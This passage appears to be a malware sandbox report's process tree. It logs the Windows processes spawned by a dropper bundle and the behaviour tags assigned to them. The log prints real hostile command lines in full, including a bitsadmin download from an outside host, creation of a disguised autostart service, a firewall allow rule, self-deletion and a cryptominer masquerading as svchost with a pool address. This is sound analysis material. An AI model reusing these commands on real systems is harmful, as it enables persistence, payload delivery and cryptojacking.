- Download via BitsAdmin
PID:7380

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
- Drops file in Program Files directory
PID:7252

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:6584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:5820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:9176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:6732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:4816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:5260

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
15⤵
PID:4384

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
16⤵
- Drops file in System32 directory
PID:8712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:4396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:9088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:8856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:4664

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
15⤵
PID:7096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boxt0cpw.edg\GcleanerWW.exe /mixone & exit
13⤵
PID:7460

C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
"C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
9⤵
PID:1028

C:\Users\Admin\AppData\Roaming\6368462.exe
"C:\Users\Admin\AppData\Roaming\6368462.exe"
10⤵
PID:5904

C:\Users\Admin\AppData\Roaming\8933555.exe
"C:\Users\Admin\AppData\Roaming\8933555.exe"
10⤵
- Suspicious behavior: SetClipboardViewer
PID:6516

C:\Users\Admin\AppData\Roaming\5617989.exe
"C:\Users\Admin\AppData\Roaming\5617989.exe"
10⤵
PID:1772

C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
"C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
9⤵
PID:7116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:7340

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
11⤵
- Kills process with taskkill
PID:7944

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:8624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe & exit
5⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
6⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe" -a
7⤵
PID:4304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkswjkle.nxl\jhuuee.exe & exit
5⤵
PID:900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe & exit
5⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
6⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
"C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe"
7⤵
- Modifies data under HKEY_USERS
PID:7900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe & exit
5⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
6⤵
PID:3512

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:4724

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:6772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe & exit
5⤵
PID:8308

C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
6⤵
- Checks whether UAC is enabled
PID:7296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe & exit
5⤵
PID:2396

C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
6⤵
PID:8276

C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
7⤵
- Checks SCSI registry key(s)
PID:8268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S & exit
5⤵
PID:9184

C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S
6⤵
- Drops file in Program Files directory
PID:8648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:2532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
- Blocklisted process makes network request
- Checks processor information in registry
PID:7116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:6024

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:9104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:9136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:7080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
- Checks for any installed AV software in registry
PID:8536

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
7⤵
- Download via BitsAdmin
PID:4728

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
- Drops file in Program Files directory
PID:7544

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
PID:6740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:5076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:8532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Checks for any installed AV software in registry
PID:9132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:8332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:8028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:5320

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
7⤵
PID:8888

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
8⤵
- Drops file in System32 directory
PID:7000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
- Drops file in Program Files directory
PID:8088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Drops file in System32 directory
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:9064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:5344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
7⤵
PID:8448

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
7⤵
PID:7312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak51mapg.3ij\GcleanerWW.exe /mixone & exit
5⤵
- Blocklisted process makes network request
- Modifies data under HKEY_USERS
PID:1828

C:\Users\Admin\AppData\Local\Temp\4AEF.exe
C:\Users\Admin\AppData\Local\Temp\4AEF.exe
1⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\4AEF.exe
"C:\Users\Admin\AppData\Local\Temp\4AEF.exe"
2⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\4D22.exe
C:\Users\Admin\AppData\Local\Temp\4D22.exe
1⤵
PID:6480

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ttwidmrg\
2⤵
PID:5156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\peiqysd.exe" C:\Windows\SysWOW64\ttwidmrg\
2⤵
PID:2324

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ttwidmrg binPath= "C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d\"C:\Users\Admin\AppData\Local\Temp\4D22.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:5936

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ttwidmrg "wifi internet conection"
2⤵
PID:988

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ttwidmrg
2⤵
PID:4992

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:4476

C:\Users\Admin\AppData\Local\Temp\54D4.exe
C:\Users\Admin\AppData\Local\Temp\54D4.exe
1⤵
PID:2736

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4148

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:5148

C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe
C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d"C:\Users\Admin\AppData\Local\Temp\4D22.exe"
1⤵
PID:6576

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3696

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:7244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5444

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4320

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4952

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4952 -s 1668
2⤵
- Program crash
PID:6028

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:6708

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
PID:1028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5644 -s 2880
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
1⤵
PID:7152

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5612

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
PID:4412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:7232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:2736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8644

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:9100

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:636

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8864

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:9140

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
PID:9088

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:4912

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
PID:4764

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5880

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
PID:9204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 616
3⤵
- Program crash
PID:5220

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
PID:4216

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
- Suspicious use of SetThreadContext
PID:8276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8568

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4148

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5480

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5184

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4984

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4984 -s 1212
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9088

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:7120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9032

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
